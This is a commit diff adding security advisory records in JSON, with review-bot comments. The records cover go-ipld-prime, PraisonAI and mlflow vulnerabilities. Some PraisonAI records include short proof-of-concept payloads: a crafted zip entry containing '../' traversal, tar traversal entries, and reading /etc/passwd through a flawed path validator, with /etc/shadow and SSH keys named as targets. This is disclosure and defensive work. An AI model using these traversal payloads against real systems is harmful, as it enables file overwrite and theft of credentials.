
Commit 8022ffb

1 parent 2d2992c commit 8022ffb

8 files changed

Lines changed: 439 additions & 10 deletions

Lines changed: 65 additions & 0 deletions
@@ -0,0 +1,65 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-378j-3jfj-8r9f",
4+
"modified": "2026-04-06T23:08:24Z",
5+
"published": "2026-04-06T23:08:24Z",
6+
"aliases": [
7+
"CVE-2026-35480"
8+
],
9+
"summary": "go-ipld-prime: DAG-CBOR decoder unbounded memory allocation from CBOR headers",
10+
"details": "The DAG-CBOR decoder uses collection sizes declared in CBOR headers as Go preallocation hints for maps and lists. The decoder does not cap these size hints or account for their cost in its allocation budget, allowing small payloads to cause excessive memory allocation.\n\nA CBOR map or list header can declare an arbitrarily large number of entries, causing the decoder to preallocate proportionally large backing structures before any entries are actually read. Because the allocation budget is only decremented as entries are decoded (not when sizes are declared), this cost is effectively invisible to the budget system. This is compounded by nesting: each level of a nested structure triggers its own unchecked preallocation while consuming minimal budget (one entry per parent level), so a payload under 100 bytes with 10 levels of nesting can cause over 9GB of allocation.\n\nSchema-free decoding (i.e. using `basicnode.Prototype.Any`) allows arbitrary nesting depth. Schema-bound decoding limits nesting to the schema's structure, but any field typed as `Any` in the schema permits unconstrained nesting within that field.\n\nThe fix caps the preallocation size hint to 1024 entries and decrements the allocation budget when collection sizes are declared. The declared length is still used for entry-count validation, and collections grow dynamically as entries are decoded, so correctly-formed data is unaffected, even beyond the preallocation limit.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/ipld/go-ipld-prime"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "0.22.0"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/ipld/go-ipld-prime/security/advisories/GHSA-378j-3jfj-8r9f"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/ipld/go-ipld-prime/commit/e43bf4a27055fe8d895671a731ee5041e2d983a9"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/ipld/go-ipld-prime"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/ipld/go-ipld-prime/releases/tag/v0.22.0"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-770"
59+
],
60+
"severity": "MODERATE",
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2026-04-06T23:08:24Z",
63+
"nvd_published_at": null
64+
}
65+
}
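Review bot: the CVSS vector's AV:L deserves a second look against the details, which describe an attacker-supplied DAG-CBOR payload of under 100 bytes driving over 9GB of allocation and never restrict where that payload comes from; if the decoder is normally fed data received from peers, AV:N is the more accurate attack vector and the MODERATE value in `database_specific.severity` would move with it. Minor: this record omits `database_specific.last_known_affected_version_range` under `affected`, which the PraisonAI records in this commit include.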
Lines changed: 64 additions & 0 deletions
@@ -0,0 +1,64 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-4ph2-f6pf-79wv",
4+
"modified": "2026-04-06T23:08:55Z",
5+
"published": "2026-04-06T23:08:55Z",
6+
"aliases": [
7+
"CVE-2026-39307"
8+
],
9+
"summary": "PraisonAI Has Arbitrary File Write (Zip Slip) in Templates Extraction",
10+
"details": "The PraisonAI templates installation feature is vulnerable to a \"Zip Slip\" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's `zipfile.extractall()` without verifying if the files within the archive resolve outside of the intended extraction directory. \n\n### Details\nLocation: `src/praisonai/praisonai/cli/features/templates.py` (Line 852)\n\nVulnerable Code snippet:\n```python\nzip_ref.extractall(tmpdir)\n```\n\nDuring installation, the CLI downloads a ZIP archive and extracts it directly into a temporary directory using `zip_ref.extractall(tmpdir)`. A specially crafted ZIP archive can contain file entries with relative paths (such as `../../../../tmp/evil.sh`). If extracting this archive in older Python versions or environments where extraction rules aren't strict, `extractall` will write these files outside the target directory, allowing an attacker to overwrite arbitrary files on the victim's filesystem.\n\n### PoC\n1. Generate a malicious zip payload:\n```python\nimport zipfile\n\nwith zipfile.ZipFile('malicious_template.zip', 'w') as z:\n # Adding a file that traverses directories\n z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip')\n```\n2. Trick a user into installing the malicious template:\n```bash\npraisonai templates install github:attacker/malicious_template\n```\n3. Observe the `zip_slip_pwned.txt` file created in `/tmp/` on the victim's machine.\n\n### Impact\nThis is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dotfiles, or application code, ultimately leading to system corruption or full Remote Code Execution (RCE).",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "PraisonAI"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "4.5.113"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 4.5.112"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4ph2-f6pf-79wv"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/MervinPraison/PraisonAI"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113"
53+
}
54+
],
55+
"database_specific": {
56+
"cwe_ids": [
57+
"CWE-23"
58+
],
59+
"severity": "HIGH",
60+
"github_reviewed": true,
61+
"github_reviewed_at": "2026-04-06T23:08:55Z",
62+
"nvd_published_at": null
63+
}
64+
}
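Review bot: the details hedge that `zipfile.extractall()` only writes outside the target directory "in older Python versions or environments where extraction rules aren't strict", yet nothing in `affected` or the severity block captures that precondition; the record should name the runtime condition under which the write actually escapes, otherwise the HIGH rating with I:H/A:H is assessed against a worst case the text itself says may not apply. Also, this record uses CWE-23 while the sibling PraisonAI tar-extraction record in this commit uses CWE-22 for the same class of `../` traversal; the two should be aligned.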
Lines changed: 64 additions & 0 deletions
@@ -0,0 +1,64 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-4rx4-4r3x-6534",
4+
"modified": "2026-04-06T23:09:12Z",
5+
"published": "2026-04-06T23:09:12Z",
6+
"aliases": [
7+
"CVE-2026-39306"
8+
],
9+
"summary": "PraisonAI recipe registry pull path traversal writes files outside the chosen output directory",
10+
"details": "### Summary\n\nPraisonAI's recipe registry pull flow extracts attacker-controlled `.praison` tar archives with `tar.extractall()` and does not validate archive member paths before extraction. A malicious publisher can upload a recipe bundle that contains `../` traversal entries and any user who later pulls that recipe will write files outside the output directory they selected.\n\nThis is a path traversal / arbitrary file write vulnerability on the client side of the recipe registry workflow. It affects both the local registry pull path and the HTTP registry pull path. The checksum verification does not prevent exploitation because the malicious traversal payload is part of the signed bundle itself.\n\n### Details\n\nThe issue is caused by unsafe extraction of tar archive contents during recipe pull.\n\n1. A malicious publisher creates a valid `.praison` bundle whose `manifest.json` is benign enough to pass publish, but whose tar members include traversal entries such as:\n\n```text\n../../escape-http.txt\n```\n\n2. `LocalRegistry.publish()` in `src/praisonai/praisonai/recipe/registry.py:214-287` only reads `manifest.json`, calculates a checksum, and stores the uploaded bundle. It does not inspect or sanitize the rest of the tar members before saving the archive.\n\n3. When a victim later pulls the recipe from a local registry, `LocalRegistry.pull()` in `src/praisonai/praisonai/recipe/registry.py:289-345` extracts the tarball directly:\n\n```python\nrecipe_dir = output_dir / name\nrecipe_dir.mkdir(parents=True, exist_ok=True)\n\nwith tarfile.open(bundle_path, \"r:gz\") as tar:\n tar.extractall(recipe_dir)\n```\n\n4. The HTTP client path is also vulnerable. 
`HttpRegistry.pull()` in `src/praisonai/praisonai/recipe/registry.py:691-739` downloads the bundle and then performs the same unsafe extraction:\n\n```python\nrecipe_dir = output_dir / name\nrecipe_dir.mkdir(parents=True, exist_ok=True)\n\nwith tarfile.open(bundle_path, \"r:gz\") as tar:\n tar.extractall(recipe_dir)\n```\n\n5. Because no archive member validation is performed, traversal entries escape `recipe_dir` and create files elsewhere on disk.\n\nVerified vulnerable behavior:\n\n- Published recipe name: `evil-http`\n- Victim-selected output directory: `/tmp/praisonai-pull-traversal-poc/victim-output`\n- Artifact created outside that directory: `/tmp/praisonai-pull-traversal-poc/escape-http.txt`\n- Artifact contents: `owned over http`\n\nThis demonstrates that a remote publisher can cause filesystem writes outside the pull destination chosen by another user.\n\n### PoC\n\nRun the single verification script from the checked-out repository:\n\n```bash\ncd \"/Users/r1zzg0d/Documents/CVE hunting/targets/PraisonAI\"\npython3 tmp/pocs/poc2.py\n```\n\nExpected vulnerable output:\n\n```text\n[+] Publish result: {'ok': True, 'name': 'evil-http', 'version': '1.0.0', ...}\n[+] Pull result: {'name': 'evil-http', 'version': '1.0.0', ...}\n[+] Outside artifact exists: True\n[+] Artifact also inside output dir: False\n[+] Outside artifact content: 'owned over http\\n'\n[+] RESULT: VULNERABLE - pulling the recipe created a file outside the chosen output directory.\n```\n\nThen verify the created file manually:\n\n```bash\nls -l /tmp/praisonai-pull-traversal-poc/escape-http.txt\ncat /tmp/praisonai-pull-traversal-poc/escape-http.txt\nfind /tmp/praisonai-pull-traversal-poc -maxdepth 3 | sort\n```\n\nWhat the script does internally:\n\n1. Starts a local PraisonAI recipe registry server.\n2. Builds a malicious `.praison` bundle containing the tar entry `../../escape-http.txt`.\n3. Publishes the malicious bundle to the local HTTP registry.\n4. 
Simulates a victim pulling that recipe into `/tmp/praisonai-pull-traversal-poc/victim-output`.\n5. Confirms that the file is created outside the chosen output directory.\n\n### Impact\n\nThis is a path traversal / arbitrary file write vulnerability in the recipe pull workflow.\n\nImpacted parties:\n\n- Users who pull recipes from an untrusted or shared PraisonAI registry.\n- Teams running internal registries where one publisher can influence what other users pull.\n- Automated systems or CI jobs that fetch recipes into working directories near sensitive project files.\n\nSecurity impact:\n\n- Integrity impact is high because an attacker can create or overwrite files outside the expected extraction directory.\n- Availability impact is significant if the overwritten target is a config file, project file, startup script, or another operational artifact.\n- The issue crosses a real security boundary because the attacker only needs to publish a malicious recipe, while the victim triggers the write by pulling it.\n\n### Remediation\n\n1. Replace raw `tar.extractall()` with a safe extraction routine that validates every `TarInfo` member before extraction. Reject absolute paths, `..` segments, and any resolved path that escapes the intended extraction directory.\n\n2. Apply the same archive member validation in both `LocalRegistry.pull()` and `HttpRegistry.pull()` so that local and remote registry clients share the same safety guarantees.\n\n3. Consider validating tar contents during publish as well, so malicious bundles are rejected before they ever enter the registry and cannot be served to downstream users.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "PraisonAI"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "4.5.113"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 4.5.112"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4rx4-4r3x-6534"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/MervinPraison/PraisonAI"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113"
53+
}
54+
],
55+
"database_specific": {
56+
"cwe_ids": [
57+
"CWE-22"
58+
],
59+
"severity": "HIGH",
60+
"github_reviewed": true,
61+
"github_reviewed_at": "2026-04-06T23:09:12Z",
62+
"nvd_published_at": null
63+
}
64+
}
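Review bot: the PoC in `details` points at a reporter-local checkout (`cd "/Users/r1zzg0d/Documents/CVE hunting/targets/PraisonAI"`) and a script `tmp/pocs/poc2.py` that is not part of the PraisonAI repository, so a reader of the advisory cannot reproduce anything from the record as published; the reproduction steps should be trimmed to the repository-independent description the record already contains ("What the script does internally"), and the local path dropped. Separately, `references` has no entry for the fixing commit or pull request, only the advisory, package and release tag; the go-ipld-prime record in this commit shows the expected shape.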
Lines changed: 64 additions & 0 deletions
@@ -0,0 +1,64 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-693f-pf34-72c5",
4+
"modified": "2026-04-06T23:09:28Z",
5+
"published": "2026-04-06T23:09:28Z",
6+
"aliases": [
7+
"CVE-2026-35615"
8+
],
9+
"summary": "PraisonAI Has Path Traversal in FileTools",
10+
"details": "### Executive Summary:\nThe path validation has a critical logic bug: it checks for `..` AFTER `normpath()` has already collapsed all `..` sequences. This makes the check completely useless and allows trivial path traversal to any file on the system.\nThe path validation function also does not resolve the symlink wich could potentially cause path traversal.\n\n### Details:\n`_validate_path()` calls `os.path.normpath()` first, which collapses `..` sequences, then checks for `'..'` in normalized. Since `..` is already collapsed, the check always passes.\n\n**Vulnerable File:**\n`src/praisonai-agents/praisonaiagents/tools/file_tools.py`\n\n**Lines:**\n42-49\n\n```python\nclass FileTools:\n \"\"\"Tools for file operations including read, write, list, and information.\"\"\"\n \n @staticmethod\n def _validate_path(filepath: str) -> str:\n # Normalize the path\n normalized = os.path.normpath(filepath)\n absolute = os.path.abspath(normalized)\n \n # Check for path traversal attempts (.. after normalization)\n # We check the original input for '..' to catch traversal attempts\n if '..' in normalized:\n raise ValueError(f\"Path traversal detected: {filepath}\")\n \n return absolute\n```\n\n**Severity:** CRITICAL\n\n**CVSS v3.1:** 9.2 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N\n\n**CWE:** CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\n\n### Proof of concept (PoC)\n\n**Prerequisites:**\n- Ability to specify a file path can call file operations\n\n**Steps to reproduce:**\npoc.py\n```python\nfrom praisonaiagents.tools.file_tools import FileTools\n\nprint(FileTools._validate_path('/tmp/../etc/passwd'))\n# Returns: /etc/passwd\n\nprint(FileTools.read_file('/tmp/../etc/passwd'))\n# Returns: content of /etc/passwd\n```\n\n**Why this works:**\n```python\n# Current vulnerable code:\nnormalized = os.path.normpath(filepath) # Collapses .. HERE\nabsolute = os.path.abspath(normalized)\nif '..' 
in normalized: # Check AFTER collapse - ALWAYS FALSE!\n raise ValueError(...)\n```\n\n### Impact:\n- **Complete bypass** of path traversal protection\n- Access to ANY file on the system with path from any starting directory\n- Read sensitive files: `/etc/passwd`, `/etc/shadow`, `~/.ssh/id_rsa`\n- Write arbitrary files if combined with write operations\n- Affect file operations `read_file`, `write_file`, `list_files`, `get_file_info`, `copy_file`, `move_file`, `delete_file`, `download_file`\n\n\n### Additional Notes:\n- **Fix:** Check for `'..' in filepath` BEFORE calling `normpath()`, not after\n- `_validate_path` uses `os.path.normpath` and `os.path.abspath`, which don't resolve symlinks, making it vulnerable to path traversal via symlink if attacker can control the symlink.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "PraisonAI"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.5.113"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 1.5.112"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-693f-pf34-72c5"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/MervinPraison/PraisonAI"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113"
53+
}
54+
],
55+
"database_specific": {
56+
"cwe_ids": [
57+
"CWE-22"
58+
],
59+
"severity": "CRITICAL",
60+
"github_reviewed": true,
61+
"github_reviewed_at": "2026-04-06T23:09:28Z",
62+
"nvd_published_at": null
63+
}
64+
}
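Review bot: the `affected` entry names the PyPI package `PraisonAI` with `fixed: 1.5.113` and `last_known_affected_version_range: <= 1.5.112`, but the release reference points at `v4.5.113` and the two sibling PraisonAI records in this commit fix the same package at `4.5.113`; the vulnerable file sits under `src/praisonai-agents/praisonaiagents/` and the PoC imports `praisonaiagents`, so either the entry should name the distribution that ships that module with its own version line, or the versions should be corrected to `4.5.113` / `<= 4.5.112`. As written the range matches no other data in the record. Minor: the inline CVSS line in `details` is missing its closing parenthesis.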

advisories/unreviewed/2026/04/GHSA-7qhf-v65m-g5f3/GHSA-7qhf-v65m-g5f3.json renamed to advisories/github-reviewed/2026/04/GHSA-7qhf-v65m-g5f3/GHSA-7qhf-v65m-g5f3.json

Lines changed: 29 additions & 4 deletions
@@ -1,24 +1,49 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-7qhf-v65m-g5f3",
4-
"modified": "2026-04-03T18:31:23Z",
4+
"modified": "2026-04-06T23:08:07Z",
55
"published": "2026-04-03T18:31:23Z",
66
"aliases": [
77
"CVE-2026-0545"
88
],
9+
"summary": "mlflow: FastAPI job endpoints under `/ajax-api/3.0/jobs/*` are not protected by authentication or authorization",
910
"details": "In mlflow/mlflow, the FastAPI job endpoints under `/ajax-api/3.0/jobs/*` are not protected by authentication or authorization when the `basic-auth` app is enabled. This vulnerability affects the latest version of the repository. If job execution is enabled (`MLFLOW_SERVER_ENABLE_JOB_EXECUTION=true`) and any job function is allowlisted, any network client can submit, read, search, and cancel jobs without credentials, bypassing basic-auth entirely. This can lead to unauthenticated remote code execution if allowed jobs perform privileged actions such as shell execution or filesystem changes. Even if jobs are deemed safe, this still constitutes an authentication bypass, potentially resulting in job spam, denial of service (DoS), or data exposure in job results.",
1011
"severity": [
1112
{
1213
"type": "CVSS_V3",
1314
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
1415
}
1516
],
16-
"affected": [],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "mlflow"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"last_affected": "3.10.1"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
1738
"references": [
1839
{
1940
"type": "ADVISORY",
2041
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0545"
2142
},
43+
{
44+
"type": "PACKAGE",
45+
"url": "https://github.com/mlflow/mlflow"
46+
},
2247
{
2348
"type": "WEB",
2449
"url": "https://huntr.com/bounties/b2e5b028-9541-4d29-8703-a76f1a3734d8"
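Review bot: the added range ends with `last_affected: 3.10.1` rather than a `fixed` event, so the record now marks mlflow as affected with no known remediation; since the details condition the exposure on `MLFLOW_SERVER_ENABLE_JOB_EXECUTION=true` plus at least one allowlisted job function, the record should say whether a fixed release exists or is being tracked, and it would help to state that precondition as the interim mitigation. Also note the score string is `CVSS:3.0/...` while the other records in this commit carry `CVSS:3.1`; if the vector was copied from NVD that is acceptable, but it should be deliberate.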
@@ -29,8 +54,8 @@
2954
"CWE-306"
3055
],
3156
"severity": "CRITICAL",
32-
"github_reviewed": false,
33-
"github_reviewed_at": null,
57+
"github_reviewed": true,
58+
"github_reviewed_at": "2026-04-06T23:08:07Z",
3459
"nvd_published_at": "2026-04-03T18:16:21Z"
3560
}
3661
}
